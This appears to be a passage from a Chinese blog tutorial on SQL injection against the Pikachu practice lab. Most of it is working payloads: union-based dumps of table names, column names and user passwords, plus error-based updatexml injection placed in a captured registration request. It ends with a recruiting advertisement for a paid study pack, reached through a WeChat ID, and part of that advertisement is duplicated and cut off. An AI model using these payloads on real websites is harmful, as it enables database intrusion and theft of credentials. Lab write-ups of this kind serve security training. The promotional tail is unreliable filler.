回显不正常,说明带入数据库进行查询,执行了sql语句
判断字段个数
payload:
id=1 order by 1# 回显正常
id=1 order by 2# 回显正常
id=1 order by 3# 回显不正常
说明有2列字段
判断回显点
payload:
id=-1 union select 1,2#
爆数据库
payload:
id=-1 union select user(),database()#
查询数据库的用户,当前数据库
version() 查看数据库版本
@@version_compile_os 查看操作系统
爆数据表
payload:
id=-1 union select database(),table_name from information_schema.tables where table_schema=database()#
爆字段
payload:
id=-1 union select database(),column_name from information_schema.columns where table_name=‘users’#
爆数据信息
payload:
id=-1 union select database(),group_concat(username,“/”,password) from users#
看源码
成功获取用户名以及密码,MD5解密即可
字符型注入(get)
在输入框内输入admin
尝试注入:
admin后加单引号,出现报错
payload:
?name=admin’ and 1=1–+ 回显正常
?name=admin’ and 1=2–+ 回显不正常
存在注入
sql语句被执行,爆出username不存在,说明插入的语句被执行带到数据库当中去查询
接下来的步骤判断字段的个数,看回显点,爆库,爆表,爆字段,都和以上的数字型注入一致,区别就是类型不同,本题为字符型,单引号闭合,其他注入语句和以上一致。
搜索型注入
在输入框当中,尝试输入数字1
分析为,sql语句当中存在模糊查找,%字符,与一般的字符型注入和数字型注入不同的是,搜索型注入的sql语句往往形如:select xxx from xxx where xxx like ‘%abcd%’
本质上和字符型注入的方式基本一样但闭合的特殊符号换成了%
测试注入点:
payload:
?name=1%’ and 1=1–+ 回显正常
?name=1%’ and 1=2–+ 回显不正常
存在注入
说明sql语句被带到数据库当中去查询,被执行,没有查到信息
接下来的步骤判断字段的个数,看回显点,爆库,爆表,爆字段,都和以上的数字型注入一致(注入sql语句也大体一致),区别就是类型不同,本题为搜索型,%'
闭合,其他注入语句和以上一致。
xx型注入
不同的闭合方式分别去测试,本题为')
闭合
使用圆括号尝试构造闭合:
name=1 正常
name=1’ 报错
name=1’) 报错
name=1’) --+ 正常
接下来的步骤判断字段的个数,看回显点,爆库,爆表,爆字段,都和以上的数字型注入一致(注入sql语句也大体一致),区别就是类型不同,本题为其他类型的闭合方式,')
闭合,其他注入语句和以上一致。
判断字段个数:
其他的爆库,爆表,爆字段,获取信息等sql语句和以上基本一致(数字型注入)。
insert/update注入
注册用户:
首先点击注册账号
注册时,抓包获取信息
使用bp抓包,获取数据包后,发送给重发器进行测试
测试注入:
从username处开始尝试
payload:
username=xiaohong’ or updatexml(1,concat(0x7e,database()),3) or '&password=xiaohong123456&sex=%E5%A5%B3&phonenum=123123&email=hebei&add=hebei&submit=submit
’ or updatexml(1,concat(0x7e,database()),3) or ’
若查看其他数据库信息,替换database()即可
爆数据表:
payload:
’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘pikachu’ limit 0,1),0x7e),1) and ’
通过修改limit 0,1当中第一个数字的值,逐一查看即可
…
’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘pikachu’ limit 3,1),0x7e),1) and ’
当limit 3,1的时候,可查看到users这张表
爆字段
payload:
’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=‘users’ limit 0,1),0x7e),1) and ’
相同的道理,limit逐一去看列的信息
…
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
一、网安学习成长路线图
网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
二、网安视频合集
观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
三、精品网安学习书籍
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
四、网络安全源码合集+工具包
光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
五、网络安全面试题
最后就是大家最关心的网络安全面试题板块
一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
络安全面试题
最后就是大家最关心的网络安全面试题板块
一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
[外链图片转存中…(img-eG2QvnWG-1712549556764)]